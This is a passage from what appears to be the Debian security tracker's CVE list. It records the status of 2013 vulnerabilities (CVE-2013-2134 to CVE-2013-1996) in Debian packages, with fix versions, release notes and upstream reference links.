	- libstruts1.2-java (Only affects 2.x)
	NOTE: http://struts.apache.org/release/2.3.x/docs/s2-015.html
CVE-2013-2134 (Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arb ...)
	- libstruts1.2-java (Only affects 2.x)
	NOTE: http://struts.apache.org/release/2.3.x/docs/s2-015.html
CVE-2013-2133 (The EJB invocation handler implementation in Red Hat JBossWS, as used ...)
	NOT-FOR-US: JBoss WS
CVE-2013-2132 (bson/_cbsonmodule.c in the mongo-python-driver (aka. pymongo) before 2 ...)
	{DSA-2705-1}
	- pymongo 2.5.2-1 (bug #710597)
	[squeeze] - pymongo (bson module not present)
	NOTE: https://jira.mongodb.org/browse/PYTHON-532
	NOTE: https://github.com/mongodb/mongo-python-driver/commit/a060c15ef87e0f0e72974c7c0e57fe811bbd06a2
CVE-2013-2131 (Format string vulnerability in the rrdtool module 1.4.7 for Python, as ...)
	- rrdtool 1.4.8-1 (unimportant; bug #708866)
	NOTE: Non-issue, the calling application needs to perform sanitising
CVE-2013-2130 (ZNC 1.0 allows remote authenticated users to cause a denial of service ...)
	- znc 1.0-5 (bug #720632)
	[squeeze] - znc (Vulnerable code not present)
	[wheezy] - znc (Vulnerable code not present)
CVE-2013-2129 (Cross-site scripting (XSS) vulnerability in the Webform module 6.x-3.x ...)
	NOT-FOR-US: Webform Drupal contributed module
CVE-2013-2128 (The tcp_read_sock function in net/ipv4/tcp.c in the Linux kernel befor ...)
	- linux-2.6
	[squeeze] - linux-2.6 2.6.32-24
	- linux 2.6.35-1~experimental.1
	NOTE: https://git.kernel.org/linus/baff42ab1494528907bf4d5870359e31711746ae
CVE-2013-2127 (Buffer overflow in the exposure correction code in LibRaw before 0.15. ...)
	- libraw (Only affects 0.15, 0.15 was only in experimental)
	- libkdcraw (embeds libraw 0.14)
	- darktable (embeds libraw 0.14)
	NOTE: https://www.openwall.com/lists/oss-security/2013/05/28/3
	NOTE: https://github.com/LibRaw/LibRaw/commit/2f912f5b33582961b1cdbd9fd828589f8b78f21d
CVE-2013-2126 (Multiple double free vulnerabilities in the LibRaw::unpack function in ...)
	- libraw 0.15.3-1 (low; bug #710353)
	[wheezy] - libraw (Not suitable for code injection, minor issue)
	[squeeze] - libraw (Vulnerable code not present)
	- libkdcraw 4:4.8.4-2 (low; bug #711317)
	[wheezy] - libkdcraw (Not suitable for code injection, minor issue)
	- darktable 1.2.1-2 (unimportant; bug #711316)
	NOTE: Not suitable for code injection, no security impact for an end-user application like Darktable
	- kdegraphics
	[squeeze] - kdegraphics (embedded version of kdcraw+libraw too old)
	NOTE: https://www.openwall.com/lists/oss-security/2013/05/28/3
	NOTE: https://github.com/LibRaw/LibRaw/commit/19ffddb0fe1a4ffdb459b797ffcf7f490d28b5a6
CVE-2013-2125 (OpenSMTPD before 5.3.2 does not properly handle SSL sessions, which al ...)
	- opensmtpd 5.3.3p1-1
	NOTE: https://www.openwall.com/lists/oss-security/2013/05/18/8
CVE-2013-2124 (Double free vulnerability in inspect-fs.c in LibguestFS 1.20.x before ...)
	- libguestfs 1:1.20.8-1 (bug #710290)
	[wheezy] - libguestfs (Vulnerable code not present)
	NOTE: Introduced with commit https://github.com/libguestfs/libguestfs/commit/5a3da366268825b26b470cde35658b67c1d11cd4
CVE-2013-2123 (The Node access user reference module 6.x-3.x before 6.x-3.5 and 7.x-3 ...)
	NOT-FOR-US: Node access user reference Drupal contributed module
CVE-2013-2122 (The Edit Limit module 7.x-1.x before 7.x-1.3 for Drupal does not prope ...)
	NOT-FOR-US: Edit Limit Drupal contributed module
CVE-2013-2121 (Eval injection vulnerability in the create method in the Bookmarks con ...)
	- foreman (bug #663101)
CVE-2013-2120 (The %{password(...)} macro in pastemacroexpander.cpp in the KDE Paste ...)
	- kdeplasma-addons 4:5.3.2-2 (low; bug #710497)
	[jessie] - kdeplasma-addons (Minor issue)
	[wheezy] - kdeplasma-addons (Minor issue)
	[squeeze] - kdeplasma-addons (Minor issue)
	NOTE: Original fix https://projects.kde.org/projects/kde/kdeplasma-addons/repository/revisions/36a1fe49cb70f717c4a6e9eeee2c9186503a8dce not sufficient
CVE-2013-2119 (Phusion Passenger gem before 3.0.21 and 4.0.x before 4.0.5 for Ruby al ...)
	- ruby-passenger 3.0.13debian-1.1 (low; bug #710351)
	[wheezy] - ruby-passenger 3.0.13debian-1+deb7u1
CVE-2013-2118 (SPIP 3.0.x before 3.0.9, 2.1.x before 2.1.22, and 2.0.x before 2.0.23 ...)
	{DSA-2694-1}
	- spip 2.1.22-1 (bug #709674)
CVE-2013-2117 (Directory traversal vulnerability in the cgit_parse_readme function in ...)
	- cgit (Fixed before the initial upload into the archive)
CVE-2013-2116 (The _gnutls_ciphertext2compressed function in lib/gnutls_cipher.c in G ...)
	{DSA-2697-1}
	- gnutls26 2.12.23-5 (bug #709301)
	[squeeze] - gnutls26 (vulnerable code not backported)
CVE-2013-2115 (Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arb ...)
	- libstruts1.2-java (Only affects Struts 2)
CVE-2013-2114 (Unrestricted file upload vulnerability in the chunk upload API in Medi ...)
	- mediawiki 1:1.19.7+dfsg-1
	[squeeze] - mediawiki (Vulnerable code not present)
CVE-2013-2113 (The create method in app/controllers/users_controller.rb in Foreman be ...)
	- foreman (bug #663101)
CVE-2013-2112 (The svnserve server in Subversion before 1.6.23 and 1.7.x before 1.7.1 ...)
	{DSA-2703-1}
	- subversion 1.7.9-1+nmu2 (bug #711033)
	NOTE: http://subversion.apache.org/security/CVE-2013-2112-advisory.txt
CVE-2013-2111 (The IMAP functionality in Dovecot before 2.2.2 allows remote attackers ...)
	- dovecot (vulnerable code appeared in 2.2)
	[squeeze] - dovecot (vulnerable code appeared in 2.2)
	[wheezy] - dovecot (vulnerable code appeared in 2.2)
CVE-2013-2110 (Heap-based buffer overflow in the php_quot_print_encode function in ex ...)
	- php5 5.5.0~rc3+dfsg-1
	[wheezy] - php5 (Vulnerable code not present)
	[squeeze] - php5 (Vulnerable code not present)
	NOTE: https://github.com/php/php-src/commit/93e0d78ec655f59ebfa82b2c6f8486c43651c1d0
	NOTE: vulnerability introduced with commit https://git.php.net/?p=php-src.git;a=commitdiff;h=18bb426587d62f93c54c40bf8535eb8416603629
CVE-2013-2109 (WordPress plugin wp-cleanfix has Remote Code Execution ...)
	NOT-FOR-US: WordPress plugin wp-cleanfix
CVE-2013-2108 (WordPress WP Cleanfix Plugin 2.4.4 has CSRF ...)
	NOT-FOR-US: WordPress plugin wp-cleanfix
CVE-2013-2107 (Cross-site request forgery (CSRF) vulnerability in the Mail On Update ...)
	NOT-FOR-US: WordPress plugin mail-on-update
CVE-2013-2106 (webauth before 4.6.1 has authentication credential disclosure ...)
	- webauth (vulnerable code only in 4.4.1 up to 4.5.2)
CVE-2013-2105 (The Show In Browser (show_in_browser) gem 0.0.3 for Ruby allows local ...)
	NOT-FOR-US: Show In Browser Ruby Gem
CVE-2013-2104 (python-keystoneclient before 0.2.4, as used in OpenStack Keystone (Fol ...)
	- keystone (Vulnerable code only in experimental versions of keystone)
	[wheezy] - keystone (PKI token support not yet present)
	- python-keystoneclient 1:0.2.5-1
	[wheezy] - python-keystoneclient (vulnerable code not present)
	NOTE: Keystone Folsom fix: https://review.openstack.org/#/c/30743/
	NOTE: python-keystoneclient fix: https://review.openstack.org/#/c/30742/
	NOTE: Starting with 2013.1-1 code in keystone/middleware/auth_token.py moved to python-keystoneclient
CVE-2013-2103 (OpenShift cartridge allows remote URL retrieval ...)
	NOT-FOR-US: OpenShift
CVE-2013-2102 (The default configuration of Red Hat JBoss Portal before 6.1.0 enables ...)
	NOT-FOR-US: GateIn Portal
CVE-2013-2101 (Katello has multiple XSS issues in various entities ...)
	NOT-FOR-US: Katello
CVE-2013-2100 (The urlopen function in pym/portage/util/_urlopen.py in Gentoo Portage ...)
	NOT-FOR-US: Gentoo Portage binary package installer
CVE-2013-2099 (Algorithmic complexity vulnerability in the ssl.match_hostname functio ...)
	{DLA-1107-1}
	- python2.7 2.7.5-5 (low; bug #709066)
	[wheezy] - python2.7 (Backport was introduced in 2.7.3-11)
	- linkchecker 8.5-1 (low; bug #709067)
	[wheezy] - linkchecker (Minor issue)
	[squeeze] - linkchecker (Minor issue)
	- python3.2 (low; bug #708530)
	[wheezy] - python3.2 (Minor issue)
	- python3.3 3.3.2-3 (low; bug #708530)
	- python2.6 (Introduced in Python 3.2)
	- python2.5 (Introduced in Python 3.2)
	- python3.1 (Introduced in Python 3.2)
	- bzr 2.6.0~bzr6574-1 (low; bug #709068)
	[squeeze] - bzr (Minor issue)
	- python-urllib3 1.6-2 (low; bug #709070)
	[wheezy] - python-urllib3 (Minor issue)
	- python-tornado 2.4.1-3 (low; bug #709069)
	[wheezy] - python-tornado (Minor issue)
	[squeeze] - python-tornado (Minor issue)
	- w3af (low; bug #709071)
	[jessie] - w3af (Minor issue)
	[wheezy] - w3af (Minor issue)
	[squeeze] - w3af (Minor issue)
	- u1db 13.10-1 (low; bug #709486)
CVE-2013-2098 REJECTED
CVE-2013-2097 (ZPanel through 10.1.0 has Remote Command Execution ...)
	NOT-FOR-US: zPanel
CVE-2013-2096 (OpenStack Compute (Nova) Folsom, Grizzly, and Havana does not verify t ...)
	- nova 2013.1.2-2 (low; bug #710157)
	[wheezy] - nova (Minor issue)
CVE-2013-2095 (rubygem-openshift-origin-controller: API can be used to create applica ...)
	NOT-FOR-US: openshift-origin-controller Ruby Gem
CVE-2013-2094 (The perf_swevent_init function in kernel/events/core.c in the Linux ke ...)
	{DSA-2669-1}
	- linux 3.8.11-1
	[squeeze] - linux-2.6 (Vulnerable code not present)
CVE-2013-2093 (Dolibarr ERP/CRM 3.3.1 does not properly validate user input in viewim ...)
	- dolibarr 3.3.4-1 (high)
CVE-2013-2092 (Cross-site Scripting (XSS) in Dolibarr ERP/CRM 3.3.1 allows remote att ...)
	- dolibarr 3.3.4-1
CVE-2013-2091 (SQL injection vulnerability in Dolibarr ERP/CRM 3.3.1 allows remote at ...)
	- dolibarr 3.3.4-1
CVE-2013-2090 (The set_meta_data function in lib/cremefraiche.rb in the Creme Fraiche ...)
	NOT-FOR-US: Creme Fraiche Ruby Gem
CVE-2013-2089 (Incomplete blacklist vulnerability in ownCloud before 5.0.6 allows rem ...)
	- owncloud (Only affects 5.0.x)
CVE-2013-2088 (contrib/hook-scripts/svn-keyword-check.pl in Subversion before 1.6.23 ...)
	- subversion 1.7.5-1 (unimportant)
	NOTE: 1.7.5 upstream does not ship the contrib/ directory anymore
	NOTE: both affected tools not installed into the binary packages
CVE-2013-2087 (Multiple cross-site scripting (XSS) vulnerabilities in Gallery 3 befor ...)
	- gallery (Vulnerable code not present)
CVE-2013-2086 (The configuration loader in ownCloud 5.0.x before 5.0.6 allows remote ...)
	- owncloud (Only owncloud 5.0.x)
CVE-2013-2085 (Directory traversal vulnerability in apps/files_trashbin/index.php in ...)
	- owncloud (Only affects 5.0.x)
CVE-2013-2084 RESERVED
CVE-2013-2083 (The MoodleQuickForm class in lib/formslib.php in Moodle through 2.1.10 ...)
	- moodle 2.5-1 (low)
	[squeeze] - moodle (Minor issue)
	NOTE: http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-38885
CVE-2013-2082 (Moodle through 2.1.10, 2.2.x before 2.2.10, 2.3.x before 2.3.7, and 2. ...)
	- moodle 2.5-1 (low)
	[squeeze] - moodle (Minor issue)
	NOTE: http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-37245
CVE-2013-2081 (Moodle through 2.1.10, 2.2.x before 2.2.10, 2.3.x before 2.3.7, and 2. ...)
	- moodle 2.5-1 (low)
	[squeeze] - moodle (Minor issue)
	NOTE: http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-37822
CVE-2013-2080 (The core_grade component in Moodle through 2.2.10, 2.3.x before 2.3.7, ...)
	- moodle 2.5-1 (low)
	[squeeze] - moodle (Minor issue)
	NOTE: http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-37475
CVE-2013-2079 (mod/assign/locallib.php in the assignment module in Moodle 2.3.x befor ...)
	- moodle (Only affects 2.3 and later)
	NOTE: http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-38443
CVE-2013-2078 (Xen 4.0.2 through 4.0.4, 4.1.x, and 4.2.x allows local PV guest users ...)
	{DSA-3006-1}
	- xen 4.2.2-1
	[squeeze] - xen (No PVSAVE support in squeeze)
	NOTE: http://lists.xen.org/archives/html/xen-announce/2013-06/msg00000.html
CVE-2013-2077 (Xen 4.0.x, 4.1.x, and 4.2.x does not properly restrict the contents of ...)
	{DSA-3006-1}
	- xen 4.2.2-1
	[squeeze] - xen (Unsupported in squeeze-lts)
	NOTE: http://lists.xen.org/archives/html/xen-announce/2013-06/msg00001.html
CVE-2013-2076 (Xen 4.0.x, 4.1.x, and 4.2.x, when running on AMD64 processors, only sa ...)
	{DSA-3006-1}
	- xen 4.2.2-1
	[squeeze] - xen (Unsupported in squeeze-lts)
	NOTE: http://lists.xen.org/archives/html/xen-announce/2013-06/msg00002.html
CVE-2013-2075 (Multiple buffer overflows in the (1) R5RS char-ready, (2) tcp-accept-r ...)
	- chicken (Incomplete fix was never applied)
CVE-2013-2074 (kioslave/http/http.cpp in KIO in kdelibs 4.10.3 and earlier allows att ...)
	{DLA-952-1}
	- kde4libs 4:4.10.5-1 (low; bug #707776)
	[squeeze] - kde4libs (Minor issue)
	NOTE: https://bugs.kde.org/show_bug.cgi?id=319428
	NOTE: https://github.com/KDE/kdelibs/commit/65d736dab592bced4410ccfa4699de89f78c96ca
	NOTE: https://github.com/KDE/kdelibs/commit/898135a59d91184692ed1bcee8bb4c6d80d6f7b9
CVE-2013-2073 (Transifex command-line client before 0.9 does not validate X.509 certi ...)
	- transifex-client 0.9-1 (low)
	[wheezy] - transifex-client (Minor issue)
	NOTE: http://seclists.org/oss-sec/2013/q2/394
CVE-2013-2072 (Buffer overflow in the Python bindings for the xc_vcpu_setaffinity cal ...)
	{DSA-3041-1}
	- xen 4.2.2-1 (low)
	[squeeze] - xen (Minor issue, can be postponed to the next Xen DSA)
	[wheezy] - xen (Minor issue, can be postponed to the next Xen DSA)
CVE-2013-2071 (java/org/apache/catalina/core/AsyncContextImpl.java in Apache Tomcat 7 ...)
	{DSA-2897-1}
	- tomcat7 7.0.40-1 (bug #707704)
	NOTE: https://issues.apache.org/bugzilla/show_bug.cgi?id=54178
CVE-2013-2070 (http/modules/ngx_http_proxy_module.c in nginx 1.1.4 through 1.2.8 and ...)
	{DSA-2721-1}
	- nginx 1.4.1-1 (bug #708164)
	[squeeze] - nginx (Vulnerable code not present)
CVE-2013-2069 (Red Hat livecd-tools before 13.4.4, 17.x before 17.17, 18.x before 18. ...)
	NOT-FOR-US: Red Hat livecd-tools
	NOTE: https://www.openwall.com/lists/oss-security/2013/05/23/2
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=964299
CVE-2013-2068 (Multiple directory traversal vulnerabilities in the AgentController in ...)
	NOT-FOR-US: RedHat CloudForms Management Engine
CVE-2013-2067 (java/org/apache/catalina/authenticator/FormAuthenticator.java in the f ...)
	{DSA-2897-1 DSA-2725-1}
	- tomcat7 7.0.33
	- tomcat6 6.0.37
CVE-2013-2066 (Buffer overflow in X.org libXv 1.0.7 and earlier allows X servers to c ...)
	{DSA-2674-1}
	- libxv 2:1.0.7-1+deb7u1
CVE-2013-2065 ((1) DL and (2) Fiddle in Ruby 1.9 before 1.9.3 patchlevel 426, and 2.0 ...)
	{DLA-235-1}
	- ruby1.9.1 1.9.3.448-1 (low)
	[wheezy] - ruby1.9.1 1.9.3.194-8.1+deb7u1
	- ruby1.8 (Only affects 1.9 and 2.x)
	NOTE: http://svn.ruby-lang.org/cgi-bin/viewvc.cgi?view=revision&revision=40732
CVE-2013-2064 (Integer overflow in X.org libxcb 1.9 and earlier allows X servers to t ...)
	{DSA-2686-1}
	- libxcb 1.8.1-2+deb7u1
CVE-2013-2063 (Integer overflow in X.org libXtst 1.2.1 and earlier allows X servers t ...)
	{DSA-2689-1}
	- libxtst 2:1.2.1-1+deb7u1
CVE-2013-2062 (Multiple integer overflows in X.org libXp 1.0.1 and earlier allow X se ...)
	{DSA-2685-1}
	- libxp 1:1.0.1-2+deb7u1
CVE-2013-2061 (The openvpn_decrypt function in crypto.c in OpenVPN 2.3.0 and earlier, ...)
	- openvpn 2.3.1-1 (low; bug #707329)
	[squeeze] - openvpn 2.1.3-2+squeeze2
	[wheezy] - openvpn 2.2.1-8+deb7u1
	NOTE: https://community.openvpn.net/openvpn/wiki/SecurityAnnouncement-f375aa67cc
CVE-2013-2060 (The download_from_url function in OpenShift Origin allows remote attac ...)
	NOT-FOR-US: OpenShift
CVE-2013-2059 (OpenStack Identity (Keystone) Folsom 2012.2.4 and earlier, Grizzly bef ...)
	- keystone 2013.1.1-2 (bug #707598)
	[wheezy] - keystone 2012.1.1-13+wheezy1
	NOTE: http://lists.openstack.org/pipermail/openstack-announce/2013-May/000099.html
CVE-2013-2058 (The host_start function in drivers/usb/chipidea/host.c in the Linux ke ...)
	- linux-2.6 (Vulnerable code not present)
	- linux 3.8-1
	[wheezy] - linux (Vulnerable code not present)
	NOTE: https://www.openwall.com/lists/oss-security/2013/05/03/2
CVE-2013-2057 (YaBB through 2.5.2: 'guestlanguage' Cookie Parameter Local File Includ ...)
	NOT-FOR-US: YaBB
CVE-2013-2056 (The Inter-Satellite Sync (ISS) operation in Red Hat Network (RHN) Sate ...)
	NOT-FOR-US: RHN Satellite
CVE-2013-2055 (Unspecified vulnerability in Apache Wicket 1.4.x before 1.4.23, 1.5.x ...)
	NOT-FOR-US: Apache Wicket
CVE-2013-2054 (Buffer overflow in the atodn function in strongSwan 2.0.0 through 4.3. ...)
	- strongswan 4.3.4-1
	NOTE: http://download.strongswan.org/patches/11_pluto_atodn_patch/CVE-2013-2054.txt
CVE-2013-2053 (Buffer overflow in the atodn function in Openswan before 2.6.39, when ...)
	{DSA-2893-1}
	- openswan (low; bug #709144)
CVE-2013-2052 (Buffer overflow in the atodn function in libreswan 3.0 and 3.1, when O ...)
	- libreswan (Fixed before the initial upload to Debian)
	NOTE: https://libreswan.org/security/CVE-2013-2052/CVE-2013-2052.txt
CVE-2013-2051 (The Tomcat 6 DIGEST authentication functionality as used in Red Hat En ...)
	- tomcat6 (RedHat-specific issue)
	- tomcat7 (RedHat-specific issue)
CVE-2013-2050 (SQL injection vulnerability in the miq_policy controller in Red Hat Cl ...)
	NOT-FOR-US: CloudForms Management Engine
CVE-2013-2049 (Red Hat CloudForms 2 Management Engine (CFME) allows remote attackers ...)
	NOT-FOR-US: CloudForms Management Engine
CVE-2013-2048 (ownCloud before 5.0.6 does not properly check permissions, which allow ...)
	- owncloud (Only affects 5.0.x)
CVE-2013-2047 (The login page (aka index.php) in ownCloud before 5.0.6 does not disab ...)
	- owncloud (Only 5.0.x)
CVE-2013-2046 (SQL injection vulnerability in lib/bookmarks.php in ownCloud Server 4. ...)
	- owncloud (Only affects 4.5.x)
CVE-2013-2045 (SQL injection vulnerability in lib/db.php in ownCloud Server 5.0.x bef ...)
	- owncloud (Only affects 5.0.x)
CVE-2013-2044 (Open redirect vulnerability in the Login Page (index.php) in ownCloud ...)
	- owncloud (Only 5.0.x)
CVE-2013-2043 (apps/calendar/ajax/events.php in ownCloud before 4.5.11 and 5.x before ...)
	- owncloud (Only 5.0.x and 4.5.x)
CVE-2013-2042 (Multiple cross-site scripting (XSS) vulnerabilities in ownCloud before ...)
	- owncloud 4.0.15debian-1
CVE-2013-2041 (Multiple cross-site scripting (XSS) vulnerabilities in ownCloud 5.0.x ...)
	- owncloud (Only affects 5.0.x)
CVE-2013-2040 (Multiple cross-site scripting (XSS) vulnerabilities in ownCloud before ...)
	- owncloud 4.0.15debian-1
CVE-2013-2039 (Directory traversal vulnerability in lib/files/view.php in ownCloud be ...)
	- owncloud 4.0.15debian-1
CVE-2013-2038 (The NMEA0183 driver in gpsd before 3.9 allows remote attackers to caus ...)
	- gpsd 3.6-5 (bug #706665)
	[wheezy] - gpsd 3.6-4+deb7u1
	[squeeze] - gpsd (Minor issue)
	NOTE: http://lists.nongnu.org/archive/html/gpsd-dev/2013-05/msg00000.html
CVE-2013-2037 (httplib2 0.7.2, 0.8, and earlier, after an initial connection is made, ...)
	- python-httplib2 0.8-2 (low; bug #706602)
	[squeeze] - python-httplib2 (Minor issue)
	[wheezy] - python-httplib2 0.7.4-2+deb7u1
	NOTE: http://openwall.com/lists/oss-security/2013/05/01/5
CVE-2013-2036 (Cross-site scripting (XSS) vulnerability in the Filebrowser module 6.x ...)
	NOT-FOR-US: Drupal module Filebrowser
CVE-2013-2035 (Race condition in hawtjni-runtime/src/main/java/org/fusesource/hawtjni ...)
	- hawtjni 1.10-1 (low; bug #708293)
	[wheezy] - hawtjni 1.0~+git0c502e20c4-3+deb7u1
CVE-2013-2034 (Multiple cross-site request forgery (CSRF) vulnerabilities in Jenkins ...)
	- jenkins 1.509.2+dfsg-1 (bug #706725)
CVE-2013-2033 (Cross-site scripting (XSS) vulnerability in Jenkins before 1.514, LTS ...)
	- jenkins 1.509.2+dfsg-1 (bug #706725)
CVE-2013-2032 (MediaWiki before 1.19.6 and 1.20.x before 1.20.5 does not allow extens ...)
	{DSA-2891-1}
	- mediawiki 1:1.19.6-1 (low; bug #706601)
	[squeeze] - mediawiki
	NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=46590
CVE-2013-2031 (MediaWiki before 1.19.6 and 1.20.x before 1.20.5 allows remote attacke ...)
	{DSA-2891-1}
	- mediawiki 1:1.19.6-1 (bug #706601)
	[squeeze] - mediawiki
	NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=47304
CVE-2013-2030 (keystone/middleware/auth_token.py in OpenStack Nova Folsom, Grizzly, a ...)
	- nova (Option not present in nova/2012.1.1)
	NOTE: http://lists.openstack.org/pipermail/openstack-announce/2013-May/000098.html
CVE-2013-2029 (nagios.upgrade_to_v3.sh, as distributed by Red Hat and possibly others ...)
	- nagios3 (Affected file nagios.upgrade_to_v3.sh not in Debian)
	NOTE: https://www.openwall.com/lists/oss-security/2013/04/30/8
CVE-2013-2028 (The ngx_http_parse_chunked function in http/ngx_http_parse.c in nginx ...)
	- nginx (Vulnerable code not present)
CVE-2013-2027 (Jython 2.2.1 uses the current umask to set the privileges of the class ...)
	[experimental] - jython 2.7.0+repack-1
	- jython 2.7.1+repack-1 (low; bug #777079)
	[stretch] - jython (Minor issue)
	[jessie] - jython (Minor issue)
	[wheezy] - jython (Minor issue)
	[squeeze] - jython (Minor issue)
	NOTE: http://bugs.jython.org/issue2044
	NOTE: The original issue seems to be addressed in 2.7.0+repack-1, but files
	NOTE: might still be created/written to /usr/share/jython/cachedir/packages,
	NOTE: which should not live under /usr, being a cache dir.
CVE-2013-2026 REJECTED
CVE-2013-2025 (Cross-site scripting (XSS) vulnerability in Ushahidi Platform 2.5.x th ...)
	NOT-FOR-US: Ushahidi
CVE-2013-2024 (OS command injection vulnerability in the "qs" procedure from the "uti ...)
	- chicken 4.8.0.3-1 (bug #706525)
	[wheezy] - chicken (Minor issue)
	[squeeze] - chicken (Minor issue)
	NOTE: http://lists.nongnu.org/archive/html/chicken-announce/2013-04/msg00000.html
CVE-2013-2023 (Cross-site scripting (XSS) vulnerability in actionscript/Jplayer.as in ...)
	- jquery-jplayer 2.1.0-2
	NOTE: used for jPlayer 2.2.23 XSS
	NOTE: https://www.openwall.com/lists/oss-security/2013/05/05/3
CVE-2013-2022 (Multiple cross-site scripting (XSS) vulnerabilities in actionscript/Jp ...)
	- jquery-jplayer 2.1.0-2
	NOTE: https://github.com/happyworm/jPlayer/commit/c5fe17bb4459164bd59153b57248cf94b8867373
	NOTE: used for jPlayer 2.2.20 XSS
	NOTE: https://www.openwall.com/lists/oss-security/2013/05/05/3
CVE-2013-2021 (pdf.c in ClamAV 0.97.1 through 0.97.7 allows remote attackers to cause ...)
	- clamav 0.97.8+dfsg-1
	[squeeze] - clamav 0.97.8+dfsg-1~squeeze1
CVE-2013-2020 (Integer underflow in the cli_scanpe function in pe.c in ClamAV before ...)
	- clamav 0.97.8+dfsg-1
	[squeeze] - clamav 0.97.8+dfsg-1~squeeze1
CVE-2013-2019 (Stack-based buffer overflow in BOINC 6.10.58 and 6.12.34 allows remote ...)
	- boinc 6.13.6+dfsg-1 (low)
	[squeeze] - boinc (Minor issue)
	NOTE: http://boinc.berkeley.edu/gitweb/?p=boinc-v2.git;a=commitdiff;h=9a4140ae30a72e5175f3f31646d91f2d58df7156
CVE-2013-2018 (Multiple SQL injection vulnerabilities in BOINC allow remote attackers ...)
	- boinc 7.0.65+dfsg-1 (low)
	[squeeze] - boinc (Vulnerable code not present)
	[wheezy] - boinc (Minor issue)
	NOTE: server-maker not shipped in squeeze
CVE-2013-2017 (The veth (aka virtual Ethernet) driver in the Linux kernel before 2.6. ...)
	- linux 2.6.34-1
	- linux-2.6 2.6.34-1
	[squeeze] - linux-2.6 (Introduced in 2.6.33)
	NOTE: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6ec82562ffc6f297d0de36d65776cff8e5704867
	NOTE: http://marc.info/?l=linux-netdev&m=127310770900442&w=3
CVE-2013-2016 (A flaw was found in the way qemu v1.3.0 and later (virtio-rng) validat ...)
	- qemu 1.5.0+dfsg-1 (bug #710822)
	[jessie] - qemu (vulnerability introduced in 1.3.0)
	[wheezy] - qemu (vulnerability introduced in 1.3.0)
	[squeeze] - qemu (vulnerability introduced in 1.3.0)
	- qemu-kvm (vulnerability introduced in 1.3.0)
	NOTE: https://lists.gnu.org/archive/html/qemu-devel/2013-04/msg05013.html
	NOTE: https://lists.gnu.org/archive/html/qemu-devel/2013-04/msg05254.html
	NOTE: http://marc.info/?l=oss-security&m=136722323931507&w=2
	NOTE: Only practically affects virtio-rng according to the oss-security reference (and if mmap_min_addr = 0)
CVE-2013-2015 (The ext4_orphan_del function in fs/ext4/namei.c in the Linux kernel be ...)
	{DSA-2669-1 DSA-2668-1}
	- linux 3.8-1 (low)
	- linux-2.6 (low)
CVE-2013-2014 (OpenStack Identity (Keystone) before 2013.1 allows remote attackers to ...)
	- keystone 2013.1.1-2 (bug #708515)
	[wheezy] - keystone (Minor issue)
CVE-2013-2013 (The user-password-update command in python-keystoneclient before 0.2.4 ...)
	- python-keystoneclient 1:0.2.5-1 (bug #709535)
	[wheezy] - python-keystoneclient 2012.1-3+deb7u1
	NOTE: https://bugs.launchpad.net/python-keystoneclient/+bug/938315
	NOTE: https://review.openstack.org/28702
CVE-2013-2012 (autojump before 21.5.8 allows local users to gain privileges via a Tro ...)
	- autojump (vulnerable code not present for unstable)
	NOTE: experimental affected as per 21.5.1-1, see #706252
	NOTE: experimental fixed as 21.5.1-2
CVE-2013-2011 (WordPress W3 Super Cache Plugin before 1.3.2 contains a PHP code-execu ...)
	NOT-FOR-US: WP Super Cache
	NOTE: this issue exists because of an incomplete fix for CVE-2013-2009
CVE-2013-2010 (WordPress W3 Total Cache Plugin 0.9.2.8 has a Remote PHP Code Executio ...)
	NOT-FOR-US: W3 Total Cache
CVE-2013-2009 (WordPress WP Super Cache Plugin 1.2 has Remote PHP Code Execution ...)
	NOT-FOR-US: WP Super Cache
CVE-2013-2008 (WordPress Super Cache Plugin 1.3 has XSS. ...)
	NOT-FOR-US: WP Super Cache
CVE-2013-2007 (The qemu guest agent in Qemu 1.4.1 and earlier, as used by Xen, when s ...)
	- qemu (qemu guest agent introduced in 1.4, vulnerable versions were only in experimental)
	- qemu-kvm (qemu guest agent introduced in 1.4)
CVE-2013-2006 (OpenStack Identity (Keystone) Grizzly 2013.1.1, when DEBUG mode loggin ...)
	- keystone 2013.1.1-2
	[wheezy] - keystone (Minor issue)
	NOTE: https://review.openstack.org/#/c/26826/2/keystone/common/config.py
	NOTE: https://bugs.launchpad.net/keystone/+bug/1172195
CVE-2013-2005 (X.org libXt 1.1.3 and earlier does not check the return value of the X ...)
	{DSA-2680-1}
	- libxt 1:1.1.3-1+deb7u1
CVE-2013-2004 (The (1) GetDatabase and (2) _XimParseStringFile functions in X.org lib ...)
	{DSA-2693-1}
	- libx11 2:1.5.0-1+deb7u1
CVE-2013-2003 (Integer overflow in X.org libXcursor 1.1.13 and earlier allows X serve ...)
	{DSA-2681-1}
	- libxcursor 1:1.1.13-1+deb7u1
CVE-2013-2002 (Buffer overflow in X.org libXt 1.1.3 and earlier allows X servers to c ...)
	{DSA-2680-1}
	- libxt 1:1.1.3-1+deb7u1
CVE-2013-2001 (Buffer overflow in X.org libXxf86vm 1.1.2 and earlier allows X servers ...)
	{DSA-2692-1}
	- libxxf86vm 1:1.1.2-1+deb7u1
CVE-2013-2000 (Multiple buffer overflows in X.org libXxf86dga 1.1.3 and earlier allow ...)
	{DSA-2690-1}
	- libxxf86dga 2:1.1.3-2+deb7u1
CVE-2013-1999 (Buffer overflow in X.org libXvMC 1.0.7 and earlier allows X servers to ...)
	{DSA-2675-1}
	- libxvmc 2:1.0.8-1
CVE-2013-1998 (Multiple buffer overflows in X.org libXi 1.7.1 and earlier allow X ser ...)
	{DSA-2683-1}
	- libxi 2:1.6.1-1+deb7u1
CVE-2013-1997 (Multiple buffer overflows in X.org libX11 1.5.99.901 (1.6 RC1) and ear ...)
	{DSA-2693-1}
	- libx11 2:1.5.0-1+deb7u1
CVE-2013-1996 (X.org libFS 1.0.4 and earlier allows X servers to trigger allocation o ...)
	{DSA-2687-1}
	- libfs 2:1.0.4-1+deb7u1
